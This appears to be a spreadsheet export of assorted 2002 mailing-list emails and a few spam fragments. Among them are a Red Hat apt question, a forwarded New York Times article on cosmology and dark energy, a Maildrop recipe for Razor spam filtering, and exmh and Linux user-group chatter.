    <t xml:space="preserve">Back when I had regular RH7.3 there was nothing better than "apt-get upgrade". But
 now I'm running (null) beta and I have these questions:
 which version of "apt" can I use, the RH7.3 version or the "rawhide" version?
 Is there a way to use apt to update (null) with the rpms available for (null)
 through up2date, since I prefer apt to that?
 If I can use apt, can I use it to get updates from these 3 different places:
 1. the (null) up2date Redhat upgrades
 2. the (null) files at Freshrpms.net
 3. the regular RH7.3 files from freshrpms.net
 Am I asking for too much simplicity in this complicated world?
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: In the Beginning ...
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 I'm sure that at the end of the universe, they'll still only find Douglas Adams, calmly munching away on his mooburger :-)
 The prospect of expansion so rapid that the night sky empties out because other galaxies are simply *outside* our light cone -- ??!? -- is really chilling. 
 Puts comm latency in a whole new perspective... what if, in the future, processors go so fast there *is* no network? Or, at least, TCP segments would arrive so rarely they would seem as inscrutable as commandments from the heavens...
 Rohit
 khare@alumni.caltech.edu
 In the Beginning ...
 July 23, 2002
 By DENNIS OVERBYE 
 It has always been easy to make fun of cosmologists,
 confined to a dust mote lost in space, pronouncing judgment
 on the fate of the universe or the behavior of galaxies
 billions of light-years away, with only a few scraps of
 light as evidence. 
 "Cosmologists are often wrong," the Russian physicist Lev
 Landau put it, "but never in doubt." 
 For most of the 20th century, cosmology seemed less a
 science than a religious war over, say, whether the
 universe had a beginning, in a fiery Big Bang billions of
 years ago, or whether it exists eternally in the so-called
 Steady State. 
 In the last few years, however, a funny thing has happened.
 Cosmologists are beginning to agree with one another.
 Blessed with new instruments like the Hubble Space
 Telescope and other space-based observatories, a new
 generation of their giant cousins on the ground and
 ever-faster computer networks, cosmology is entering "a
 golden age" in which data are finally outrunning
 speculation. 
 "The rate at which we are learning and discovering new
 things is just extraordinary," said Dr. Charles Bennett, an
 astronomer at the Goddard Space Flight Center in Greenbelt,
 Md. 
 As a result, cosmologists are beginning to converge on what
 they call a "standard model" of the universe that is
 towering in its ambition. It purports to trace, at least in
 broad strokes, cosmic history from the millisecond after
 time began, when the universe was a boiling stew of energy
 and subatomic particles, through the formation of atoms,
 stars, galaxies and planets to the vast, dilute, dark
 future in which all of these will have died. 
 The universe, the cosmologists say, was born 14 billion
 years ago in the Big Bang. Most of its material remains
 resides in huge clouds of invisible so-called dark matter,
 perhaps elementary particles left over from the primordial
 explosion and not yet identified. 
 Within these invisible clouds, the glittery lights in the
 sky that have defined creation for generations of humans
 are swamped, like flecks of foam on a rolling sea. A good
 case can be made, scientists now agree, that the universe
 will go on expanding forever. 
 In fact, recent observations have suggested that the
 expansion of the universe is speeding up over cosmic time,
 under the influence of a "dark energy" even more mysterious
 than dark matter. 
 Recently, a group of astronomers led by Dr. William
 Percival at the University of Edinburgh combined data from
 a variety of observations to compile, based on the simplest
 theoretical model, what they say is the most precise
 enumeration yet of the parameters that cosmologists have
 been fighting about for all these decades. 
 The universe, they calculated, is 13.89 billion years old,
 plus or minus half a billion years. Only 4.8 percent of it
 is made of ordinary matter. Matter of all types, known and
 unknown, luminous and dark, accounts for just 27.5 percent.
 The rest of creation, 72.5 percent, is the mysterious dark
 energy, they reported in a paper submitted last month to
 The Monthly Notices of the Royal Astronomical Society. 
 It is a picture that in some ways is surprisingly simple,
 satisfying long-held theoretical prejudices about how the
 universe should be designed. Continued agreement with
 coming experiments may mean that science is approaching the
 end of a "great program" of cosmological tests that began
 in the 1930's, Dr. P. J. E. Peebles of Princeton and Dr.
 Bharat Ratra of Kansas State University said in the draft
 of a coming article for The Reviews of Modern Physics. 
 In other ways this new dark universe is utterly baffling, a
 road map to new mysteries. Dr. Marc Davis, a cosmologist at
 the University of California at Berkeley, called it "a
 universe chock full of exotics that don't make sense to
 anybody." 
 Moreover there are some questions that scientists still do
 not know how to ask, let alone answer, scientifically. Was
 there anything before the Big Bang? Is there a role for
 life in the cosmos? Why is there something rather than
 nothing at all? Will we ever know? 
 "We know much, but we still understand very little," said
 Dr. Michael Turner, a cosmologist at the University of
 Chicago. 
 The Big Question 
 Expanding Forever, 
 Or Big Crunch? 
 The dim caves of Lascaux, the plains of
 Stonehenge and the dreamtime tales of Australian aborigines
 all testify to the need to explain the world and existence.
 This quest took its present form in 1917. That was when
 Albert Einstein took his new general theory of relativity,
 which explained how matter and energy warp space-time to
 produce gravity, and applied it to the universe. 
 Einstein discovered that the cosmos as his theory described
 it would be unstable, prone to collapse under its own
 gravity. Astronomers, however, were sure that the universe
 was stable. So Einstein added a fudge factor that he called
 the cosmological constant to his equations. It acted as a
 long-range repulsive force to counterbalance gravity. 
 In 1929, the astronomer Edwin Hubble discovered that the
 universe was expanding. The sky was full of distant
 galaxies all rushing away from us and one another, as if
 propelled by what the British astronomer Dr. Fred Hoyle
 later called derisively a "big bang." The universe was not
 stable and, thus, did not require counterbalancing.
 Einstein abandoned his constant, referring to it as his
 biggest blunder. But it would return to haunt cosmologists,
 and the universe. 
 Hoyle's term stuck, and the notion of an explosive genesis
 became orthodoxy in 1965, when Dr. Arno Penzias and Dr.
 Robert Wilson, radio astronomers at Bell Laboratories,
 discovered a faint uniform radio glow that pervaded the
 sky. It was, cosmologists concluded, the fading remnant of
 the primordial fireball itself. 
 Relieved of their fudge factor, the equations describing
 Einstein's universe were simple. Dr. Allan Sandage, the
 Carnegie Observatories astronomer, once called cosmology
 "the search for two numbers" - one, the Hubble constant,
 telling how fast the universe is expanding, and the other
 telling how fast the expansion is slowing, and thus whether
 the universe will expand forever or not. 
 The second number, known as the deceleration parameter,
 indicated how much the cosmos had been warped by the
 density of its contents. In a high-density universe, space
 would be curved around on itself like a ball. Such a
 universe would eventually stop expanding and fall back
 together in a big crunch that would extinguish space and
 time, as well as the galaxies and stars that inhabit them.
 A low-density universe, on the other hand, would have an
 opposite or "open" curvature like a saddle, harder to
 envision, and would expand forever. 
 In between with no overall warpage at all was a
 "Goldilocks" universe with just the right density to expand
 forever but more and more slowly, so that after an infinite
 time it would coast to a stop. This was a "flat" universe
 in the cosmological parlance, and to many theorists the
 simplest and most mathematically beautiful solution of all.
 But the sky did not yield those cosmic numbers easily, even
 with the help of the 200-inch Hale telescope on Palomar
 Mountain in Southern California, dedicated in 1948, which
 had been built largely for that task. Dr. Hubble wrote of
 measuring shadows and searching "among ghostly errors of
 measurement for landmarks that are scarcely more
 substantial." 
 The Dark Side 
 Invisible Matter 
 Molds Galaxies 
 It was not till the mid-70's, a
 quarter-century after the Palomar giant began operating,
 that groups of astronomers reached the tentative conclusion
 that the universe they could see - stars, gas, planets and
 galaxies - did not have nearly enough gravitational oomph
 to stop the cosmic expansion. 
 "So the universe will continue to expand forever and
 galaxies will get farther and farther apart, and things
 will just die," Dr. Sandage said at the time. 
 But the Great Argument was just beginning. Apparently there
 was a lot of the universe that astronomers could not see.
 The stars and galaxies, were moving as if immersed in the
 gravity of giant invisible clouds of so-called dark matter
 - "missing matter" the Swiss astronomer Dr. Fritz Zwicky
 labeled it in the 1930's. 
 Many galaxies, for example, are rotating so fast that they
 would fly apart unless they were being reined in by the
 gravity of halos of dark matter, according to pioneering
 observations by Dr. Vera Rubin of the Carnegie Institution
 of Washington and her colleagues. Her measurements
 indicated that these dark halos outweighed the visible
 galaxies themselves from 5 to 10 times. But there could be
 even more dark matter farther out in space, perhaps enough
 to stop the expansion of the universe, eventually, some
 theorists suggested. Luminous matter, the Darth Vaders of
 the sky said, is like the snow on mountaintops. 
 But what is the dark matter? While some of it is gas or
 dark dim objects like stars and planets, cosmologists
 speculate that most of it is subatomic particles left over
 from the Big Bang. 
 Many varieties of these particles are predicted by theories
 of high-energy physics. But their existence has not been
 confirmed or detected in particle accelerators. 
 "We theorists can invent all sorts of garbage to fill the
 universe," Dr. Sheldon Glashow, a Harvard physicist and
 Nobel laureate, told a gathering on dark matter in 1981. 
 Collectively known as WIMP's, for weakly interacting
 massive particles, such particles would not respond to
 electromagnetism, the force responsible for light, and thus
 would be unable to radiate or reflect light. They would
 also be relatively slow-moving, or "cold" in physics
 jargon, and thus also go by the name of cold dark matter. 
 As Earth in its travels passed through the dark-matter
 cloud that presumably envelops the Milky Way, the particles
 would shoot through our bodies, rarely leaving a trace,
 like moonlight through a window. 
 But the collective gravity of such particles, cosmologists
 say, would shape the cosmos and its contents. 
 Gathering along the fault lines laid down by random
 perturbations of density in the early universe, dark matter
 would congeal into clouds with about the mass of 100,000
 Suns. The ordinary matter that was mixed in with it would
 cool and fall to the centers of the clouds and light up as
 stars. 
 The clouds would then attract other clouds. Through a
 series of mergers over billions of years, smaller clouds
 would assemble into galaxies, and the galaxies would then
 assemble themselves into clusters of thousands of galaxies,
 and so forth. 
 Using the Hubble and other telescopes as time machines -
 light travels at a finite speed, so the farther out
 astronomers look the farther back in time they see -
 cosmologists have begun to confirm that the universe did
 assemble itself from the "bottom up," as the dark matter
 model predicts. 
 Last year, two teams of astronomers reported seeing the
 first stars burning their way out of the cloudy aftermath
 of the Big Bang, when the universe was only 900 million
 years old. The bulk of galaxy formation occurred when the
 universe was a half to a quarter its present age,
 cosmologists say. 
 "The big news in the last decade is that even half a
 universe ago the universe looked pretty different," said
 Dr. Alan Dressler of the Carnegie Observatories in
 Pasadena. Galaxies before then were small and irregular,
 with no sign of the majestic spiral spider webs that
 decorate the sky today. 
 We would barely recognize our own Milky Way galaxy, if we
 could see it five billion years ago when the Sun formed, he
 said. 
 "By eight billion years back, it would be unrecognizable,"
 said Dr. Dressler. 
 Yet there are still many questions that the cold dark
 matter model does not answer. Astronomers still do not
 know, for example, how the first stars formed or why the
 models of dark matter distribution don't quite fit in the
 cores of some kinds of galaxies. Nor have the dark matter
 particles themselves been unambiguously detected or
 identified, despite continuing experiments. 
 Some astronomers suggest that the discrepancies stem from
 the inability of simple mathematical models to deal with
 messy details of the real world. 
 "It's a huge mystery exactly how stars form," Dr. Richard
 Bond of the Canadian Institute for Theoretical Astrophysics
 said. "We can't solve it now. So it's even harder to try to
 solve them back then." 
 But others, notably Dr. Mordehai Milgrom, a theorist at the
 Weizmann Institute in Israel, have suggested that modifying
 the gravitational laws by which dark matter was deduced in
 the first place would alleviate the need for dark matter
 altogether. 
 The Bang's Fuel 
 Inflating One Ounce 
 To a Whole Universe 
 Clues to what had actually exploded
 in the Big Bang emerged as an unexpected gift from another
 great scientific quest: physicists' pursuit for a so-called
 theory of everything that would unite all physical
 phenomena in a single equation. Unable to build machines
 powerful enough to test their most ambitious notions on
 Earth, some theorists turned to the sky. 
 "The Big Bang is the poor man's particle accelerator," Dr.
 Jakob Zeldovich, an influential Russian cosmologist, said. 
 Physicists recognize four forces at work in the world
 today - gravity, electromagnetism, and the strong and weak
 nuclear forces. But they suspect, based on data from
 particle accelerators and high-powered theory, that those
 are simply different manifestations of a single unified
 force that ruled the universe in its earliest, hottest
 moments. 
 As the universe cooled, according to this theory, there was
 a fall from grace, and the laws of physics evolved, with
 one force after another "freezing out," or splitting away. 
 In 1979, Dr. Alan Guth, now at the Massachusetts Institute
 of Technology, realized that a hypothesized glitch in this
 process would have had drastic consequences for the
 universe. Under some circumstances, a glass of water can
 stay liquid as the temperature falls below 32 degrees,
 until it is disturbed, at which point it will rapidly
 freeze, releasing latent heat in the process. Similarly,
 the universe could "supercool" and stay in a unified state
 too long. In that case, space itself would become
 temporarily imbued with a mysterious kind of latent heat,
 or energy. 
 Inserted into Einstein's equations, the latent energy would
 act as a kind of antigravity, and the universe would blow
 itself apart, Dr. Guth discovered in a calculation in 1979.
 In far less than the blink of an eye, 10-37 second, a speck
 much smaller than a proton would have swollen to the size
 of a grapefruit and then resumed its more stately
 expansion, with all of normal cosmic history before it,
 resulting in today's observable universe - a patch of sky
 and stars 14 billion light-years across. All, by the
 magical-seeming logic of Einstein's equations, from about
 an ounce of primordial stuff. 
 "The universe," Dr. Guth liked to say, "might be the
 ultimate free lunch." 
 Dr. Guth called his theory inflation. Inflation, as Dr.
 Guth pointed out, explains why the universe is expanding.
 Dr. Turner of the University of Chicago referred to it as
 "the dynamite behind the Big Bang." 
 As modified and improved by Dr. Andrei Linde, now at
 Stanford, and by Dr. Paul Steinhardt, now at Princeton and
 Dr. Andreas Albrecht now at the University of California at
 Davis, inflation has been the workhorse of cosmology ever
 since. One of its great virtues, cosmologists say, is that
 inflation explains the origin of galaxies, the main
 citizens of the cosmos. The answer comes from the
 paradoxical-sounding quantum rules that govern subatomic
 affairs. On the smallest scales, according to quantum
 theory, nature is lumpy, emitting even energy in little
 bits and subject to an irreducible randomness. As a result,
 so-called quantum fluctuations would leave faint lumps in
 the early universe. These would serve as the gravitational
 seeds for future galaxies and other cosmic structures. 
 As a result of such successes, cosmologists have stuck with
 the idea of inflation, even though, lacking the ability to
 test their theories at the high energies of the Big Bang,
 they have no precise theory about what might have actually
 caused it. "Inflation is actually a class of theories,"
 said Dr. Guth. 
 In the latest version, called "chaotic inflation," Dr.
 Linde has argued that quantum fluctuations in a myriad of
 theorized force fields could have done the trick. 
 Indeed, he and others now say they believe that inflation
 can occur over and over, spawning an endless chain of
 universes out of one another, like bubbles within bubbles. 
 "The universe inflates on top of itself," Dr. Linde told a
 physics conference this spring in Princeton. "It's
 happening right now." 
 The Golden Age 
 New Devices Detect 
 Primordial Glow 
 If the inflationary
 theorists are right, the universe we see, the 14 billion
 light-years, is just a tiny piece of a much vaster
 universe, or even a whole ensemble of them, forever out of
 our view. 
 According to the theory, therefore, our own little patch of
 the cosmos should appear geometrically "flat," the way a
 section of a balloon looks flat when viewed close up. This
 was the universe long thought to be the most beautiful and
 simple. 
 But it required, by the logic of Einstein's general
 relativity, that there be much more dark matter, or
 something, to the universe, enough to "flatten" space-time,
 than astronomers had found. 
 In fact, this prescription was so hard to reconcile with
 other observations, of galaxies and their evolutions, that
 by 1991 some astronomers and press reports suggested that
 the entire theoretical edifice of inflation to blow up the
 universe and cold dark matter to fill it, not to say the
 Big Bang itself, might have to be junked. 
 So it was with a sigh of relief that cosmologists greeted
 the announcement in April 1992 that NASA's Cosmic
 Background Explorer, or COBE, satellite had succeeded in
 discerning faint blotches in the primordial cosmic radio
 glow. 
 These were the seeds from which, inflation predicted, large
 cosmic structures would eventually grow. 
 "If you're religious, it's like seeing God," said Dr.
 George Smoot, a physicist from the Lawrence Berkeley
 National Laboratory who led the COBE team. 
 Astronomers say COBE signaled a transition in which heroic
 ideas about the universe began to be replaced by heroic
 data, as long-planned new telescopes and other instruments
 went into operation. 
 A year later, skywalking astronauts corrected the Hubble
 telescope's myopic vision. The cosmic background radiation
 has come in for particular scrutiny from new radio
 telescopes mounted in balloons and on mountaintops. The
 news has been good, though not decisive, for inflation. 
 For three years, a series of increasingly high-resolution
 observations has confirmed that the pattern of blotches
 stippling the remnant of the primordial fireball is
 consistent with the predictions from inflation and cold
 dark matter. The instruments have now mapped details small
 enough to have been the seeds of modern clusters of
 galaxies. 
 "I'm completely snowed by the cosmic background radiation,"
 Dr. Guth said. "The signal was so weak it wasn't even
 detected until 1965, and now they're measuring fluctuations
 of one part in 100,000." 
 Perhaps most important, the analysis of the fluctuations
 indicates that the universe has a "flat" geometry, as
 predicted by inflation. That was a triumph. Although
 observations could not prove that inflation was right, a
 nonflat universe would have been a blow to the theory, and
 to cosmological orthodoxy. 
 "Inflation, our boldest and most promising theory of the
 earliest moments of creation, passed its first very
 important test," Dr. Turner said at the time. 
 The most precise measurements of the cosmic background, at
 least in the near future, are generally expected to come
 late this year from NASA's Microwave Anisotropy Project, or
 MAP, satellite, which was launched into space last year on
 June 30. MAP will be followed by the European Space
 Agency's Planck satellite, in 2006. 
 It is highly unlikely that MAP or Planck will be able to
 detect what Dr. Turner calls "the smoking gun signature of
 inflation." The violent stretching of the universe should
 roil space-time with so-called gravitational waves that
 would leave a faint imprint on the cosmic fireball. 
 Detecting those waves would not only confirm inflation, but
 also might help scientists establish what caused the
 inflation in the first place, giving science its first look
 at the strange physics that prevailed when creation was
 only about a trillionth of a trillionth of a trillionth of
 a second old. 
 The Universe's Fate 
 Bleak Implications 
 Of `Dark Energy' 
 In 1998, two competing teams of
 astronomers startled the scientific world with the news
 that the expansion of the universe seemed to be speeding up
 under the influence of a mysterious antigravity that seems
 embedded in space itself and that is hauntingly reminiscent
 of Einstein's old, presumably discredited, cosmological
 constant. 
 "Dark energy," the phenomenon was quickly named. 
 If dark
 energy is real and the acceleration continues, the galaxies
 will eventually speed away from one another so quickly that
 they couldn't see one another. The universe would become
 cold and empty as the continued acceleration sucked away
 the energy needed for life and thought. 
 It would be "the worst possible universe," for the quality
 and quantity of life, said Dr. Lawrence Krauss, a physicist
 at Case Western Reserve University. 
 Dr. Edward Witten of the Institute for Advanced Study in
 Princeton, called the discovery of dark energy "the
 strangest experimental finding since I've been in physics."
 The discovery was a surprise to the astronomers involved.
 Neither team had expected to find the universe
 accelerating. They had each set out to measure by how much
 the expansion of the universe was slowing because of the
 gravity of its contents and thus settle the question of its
 fate. 
 One team was led by Dr. Saul Perlmutter, a physicist at
 Lawrence Berkeley. The other team was a band of astronomers
 led by Dr. Brian Schmidt of Mount Stromlo and the Siding
 Spring Observatory in Australia. 
 Each group employed far-flung networks of telescopes,
 including the Hubble, and the Internet to find and monitor
 certain exploding stars, or supernovas, as cosmic beacons.
 Such explosions, the death rattles of massive stars, are
 powerful enough to be seen clear across the universe when
 the universe was younger and, presumably, expanding faster.
 Leapfrogging each other across the universe, the two teams,
 propitiously for their credibility, arrived at the same
 answer at the same time: the cosmos was not slowing at all;
 it was speeding up. 
 Dr. Perlmutter, who had once resented the competition,
 conceded, "With only one group, it would have been a lot
 harder to get the community to buy into such a surprising
 result." 
 "This was a very strange result," said Dr. Adam Riess, a
 member of Dr. Schmidt's team. "It was the opposite of what
 we thought we were doing." 
 The results have sent Einstein's old cosmological constant
 to the forefront of cosmology. Despite his disavowal, the
 constant had never really gone away and had in fact been
 given new life by quantum physics. Einstein had famously
 rejected quantum's randomness, saying God didn't play dice.
 But it justified, in retrospect, his fudge factor. 
 According to the uncertainty principle, a pillar of quantum
 theory, empty space was not empty, but rather foaming with
 the energy of so-called virtual particles as they flashed
 in and out of existence on borrowed energy. This so-called
 vacuum energy could repel, just like Einstein's old
 cosmological constant, or attract. 
 The case for dark energy got even stronger a year later,
 when the cosmic background observations reported evidence
 of a flat universe. Because astronomers had been able to
 find only about a third as much matter, both dark and
 luminous, as was needed by Einstein's laws to create a flat
 geometry, something else had to be adding to it. 
 The discovery of dark energy exemplified Dr. Zeldovich's
 view of the universe as the poor man's particle
 accelerator, and it caught the physicists flat-footed,
 somewhat to the pride of the astronomers. 
 "A coming of age of astronomy," Dr. Dressler called it.
 What is dark energy? The question now hangs over the
 universe. 
 Is it really Einstein's old fudge factor returned to haunt
 his children? In that case, as the universe expands and the
 volume of space increases, astronomers say, the push
 because of dark energy will also increase, accelerating the
 galaxies away from one another faster and faster, leading
 to a dire dark future. 
 Other physicists, however, have pointed out that the
 theories of modern physics are replete with mysterious
 force fields, collectively called "quintessence," that
 might or might not exist, but that could temporarily
 produce negative gravity and mimic the action of a
 cosmological constant. In that case, all bets on the future
 are off. The universe could accelerate and then decelerate,
 or vice versa as the dark energy fields rose or fell. 
 A third possibility is that dark energy does not exist at
 all, in which case not just the future, but the whole
 carefully constructed jigsaw puzzle of cosmology, might be
 in doubt. The effects of cosmic acceleration could be
 mimicked, astronomers say, by unusual dust in the far
 universe or by unsuspected changes in the characteristics
 of supernovas over cosmic time. As a result, more groups
 are joining the original two teams in the hunt for new
 supernovas and other ways to measure the effects of dark
 energy on the history of the universe. 
 Dr. Perlmutter has proposed building a special satellite
 telescope, the Supernova Astronomy Project, to investigate
 exactly when and how abruptly the cosmic acceleration
 kicked in. 
 The Nagging QuestionsA Grand Synthesis, 
 But Hardly Complete 
 For all the new answers being
 harvested, some old questions linger, and they have now
 been joined by new ones. 
 A flat universe is the most mathematically appealing
 solution of Einstein's equations, cosmologists agree. But
 they are puzzled by the specific recipe, large helpings of
 dark matter and dark energy, that nature has chosen. Dr.
 Turner called it "a preposterous universe." 
 But Dr. Martin Rees, a Cambridge University cosmologist,
 said that the discovery of a deeper principle governing the
 universe and, perhaps, life, may alter our view of what is
 fundamental. Some features of the universe that are now
 considered fundamental - like the exact mixture of dark
 matter, dark energy and regular stuff in the cosmos - may
 turn out to be mere accidents of evolution in one out of
 the many, many universes allowed by eternal inflation. 
 "If we had a theory, then we would know whether there were
 many big bangs or one," Dr. Rees said. The answers to these
 and other questions, many scientists suspect, have to await
 the final unification of physics, a theory that reconciles
 Einstein's relativity, which describes the shape of the
 universe, to the quantum chaos that lives inside it. 
 Such a theory, quantum gravity, is needed to describe the
 first few moments of the universe, when it was so small
 that even space and time should become fuzzy and
 discontinuous. 
 For two decades, many physicists have placed their bets for
 quantum gravity on string theory, which posits that
 elementary particles are tiny strings vibrating in a 10- or
 11-dimensional space. Each kind of particle, in a sense,
 corresponds to a different note on the string. 
 In principle, string theory can explain all the forces of
 nature. But even its adherents concede that their equations
 are just approximations to an unknown theory that they call
 M-theory, with "M" standing for matrix, magic, mystery or
 even mother, as in "mother of all theories." Moreover, the
 effects of "stringy physics" are only evident at energies
 forever beyond the limits of particle accelerators. 
 Some string theorists have ventured into cosmology, hoping,
 to discover some effect that would show up in the poor
 man's particle accelerator, the sky. 
 In addition to strings, the theory also includes membranes,
 or "branes," of various dimensions. Our universe can be
 envisioned as such a brane floating in higher-dimensional
 space like a leaf in a fish tank, perhaps with other brane
 universes nearby. These branes could interact
 gravitationally or even collide, setting off the Big Bang. 
 In one version suggested last year by four cosmologists
 led by Dr. Steinhardt of Princeton, another brane would
 repeatedly collide with our own. They pass back and forth
 through each other, causing our universe to undergo an
 eternal chain of big bangs. 
 Such notions are probably the future for those who are paid
 to wonder about the universe. 
 And the fruits of this work could yet cause cosmologists to
 reconsider their new consensus, warned Dr. Peebles of
 Princeton, who has often acted as the conscience of the
 cosmological community, trying to put the brakes on faddish
 trends. 
 He wonders whether the situation today can be compared to
 another historical era, around 1900, when many people
 thought that physics was essentially finished and when the
 English physicist Lord Kelvin said that just a couple of
 "clouds" remained to be dealt with. 
 "A few annoying tidbits, which turned out to be relativity
 and quantum theory," the twin revolutions of 20th-century
 science, Dr. Peebles said. 
 Likewise, there are a few clouds today like what he called
 "the dark sector," which could have more complicated
 physics than cosmologists think. 
 "I'm not convinced these clouds herald revolutions as deep
 as relativity and quantum mechanics," Dr. Peebles said.
 "I'm not arguing that they won't." 
 As for the fate of the universe, we will never have a firm
 answer, said Dr. Sandage, who was Hubble's protg and has
 seen it all. 
 "It's like asking, `Does God exist?' " he said.
 Predicting the future, he pointed out, requires faith that
 simple mathematical models really work to describe the
 universe. 
 "I don't think we really know how things work," he said.
 Although Dr. Sandage does not buy into all aspects of the
 emerging orthodoxy, he said it was a fantastic time to be
 alive. 
 "It's all working toward a much grander synthesis than we
 could have imagined 100 years ago," he said. "I think this
 is the most exciting life I could have had."
 http://www.nytimes.com/2002/07/23/science/space/23UNIV.html?ex=1028416223&amp;ei=1&amp;en=ff38ea5fac0c9158
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....                   P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</si>
  <si>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c.l.kyle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</si>
  <si>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On Fri, Aug 02, 2002 at 01:41:30PM +0100, Colm Buckley wrote:
 &gt; Wearing my other hat today - we're looking for a competent and
 &gt; experienced system administrator here, and I'd like anyone who's
 &gt; interested to contact me.
 hey, so are we!
 &gt; The job is for a Windows (NT and 2000) and Linux (Debinan) system
 [admin]
 but we use a real distribution (redhat), so if you were ok up to the
 debian part, drop me a line.  it does involve windows, it will involve
 it a lot.  the linux stuff will be minor, though as times go on that
 might change.  the main part is corporate windows desktop support.
 please mail me if you're interested?
 thanks!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</si>
  <si>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
 Here is my recipe for Maildrop:
 # Vipul's Razor check
 #
 log `/usr/bin/razor-check`
 log "razor-check = $RETURNCODE"
 if ( $RETURNCODE == 0 )
 {
   xfilter "reformail -a'X-Razor: SPAM'"
   log "SPAM caught by Vipul's Razor"
   to "$FOLDERS/.SPAM/"
 }
 I used this with Razor version 1.  I'm not sure if it was ever used
 with Razor2.  I am now using SpamAssassin w/ Razor2.  You may wish to
 remove the log statements once running.
 I use both.  SpamAssassin (SA) catches things that Razor does not.  There
 were enough false positives with Razor that I do not trust it alone.
 After whitelisting all the newsletters I receive, SA w/ Razor2 does a
 very good job.
 HTH,
   Jeffrey
 Quoting Sunil William Savkar &lt;sunil@inthespace.com&gt;:
 &gt; Hi.
 &gt;
 &gt; I just finished installing and getting running maildrop with my virtual
 &gt; users.  I was thinking to set up razor with maildrop as my first test of
 &gt; its filtering capabilities..
 &gt;
 &gt; I have seen documentation out there for procmail, but is there similar
 &gt; documentation for integrating maildrop with razor?
 &gt; 
 &gt;  
 &gt; 
 &gt; Separately, it looks like many people use spamassassin with razor.  If I
 &gt; am using razor2, is there still an advantage to this?
 &gt; 
 &gt;  
 &gt; 
 &gt; Thanks in advance.
 &gt; 
 &gt;  
 &gt; 
 &gt; Sunil
 &gt; 
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I have 3rd degree burn scars on both hands. I can hold that match if I want
 to :-)
 -----Original Message-----
 From: John P. Looney [mailto:valen@tuatha.org]
 Sent: 31 July 2002 12:26
 To: Irish LUG
 Subject: Re: [ILUG] Fwd: Linux Beer Hike
 On Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:
 &gt; I dislike being forced to learn something and mostly refuse to do it. 
  Did you burn yourself often, as a child ?
 John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</si>
  <si>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Subject: Senators threaten to rein in Bush
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456087,215/
 Date: 2002-10-02T03:56:58+01:00
 *World latest:* Leading Republicans side with the Democrats over the 
 president's war powers.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "b" == bitbitch  &lt;bitbitch@magnesium.net&gt; writes:
     b&gt; My only problem with this article ...
 I know I'll get my share of flames for saying so, but my only problem
 with this article is that it is some of the scariest subtext hate-lit
 propaganda I've seen come out of the US since the March of Tears, and
 twice scarier that it is not seen as such.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I'm back in town...
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1920300774P
 Content-Type: text/plain; charset=us-ascii
 I've been working on salary related things the past few days, but I'm starting 
 to think about exmh again.
 Thanks to Robert for finding that s/$L/$lineno/ bug.
 So, has anybody else been looking at the performance issues that we were 
 talking about before I left, or should I dig right in?
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1920300774P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9i297K9b4h5R0IUIRAiURAJ9aNU4uwQn+EwNOJlrvGJp9U4wVNQCcCkmT
 KgDY1o8a2qpBe53DfoNyX9g=
 =LClg
 -----END PGP SIGNATURE-----
 --==_Exmh_1920300774P--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 User-Agent: Microsoft-Entourage/10.1.0.2006
 Date: Thu, 03 Oct 2002 07:56:39 +0100
 Subject: The 3rd Annual Consult Hyperion Digital Identity Forum
 From: "David G.W. Birch" &lt;dgw-lists@birches.org&gt;
 To: Bob Hettinga &lt;rah@shipwright.com&gt;
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;
 Dear All,
 See www.digitalidentityforum.com for more details. Speakers include
 Microsoft and Liberty Alliance, UK central and local government, law
 enforcement, financial services (Egg and RBS/NatWest), EC Research Centre, a
 psychologist and others. Look forward to seeing you there.
 Regards,
 Dave Birch.
 -- 
 -- David Birch, Director, Consult Hyperion
 -- 
 -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 -- mail dave@chyp.com, web http://www.chyp.com
 -- 
 -- See you at the 2nd Annual Digital Transactions Forum in Singapore
 -- October 16th/17th 2002, see http://www.digitaltransactionsforum.com/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</si>
  <si>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Subject: Cut Your Monthly Payments By 50% 21405
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;SCRIPT&gt;
 &lt;!--
 function Filtered()
 {
 return 0
 }
 //--&gt;
 &lt;/SCRIPT&gt;
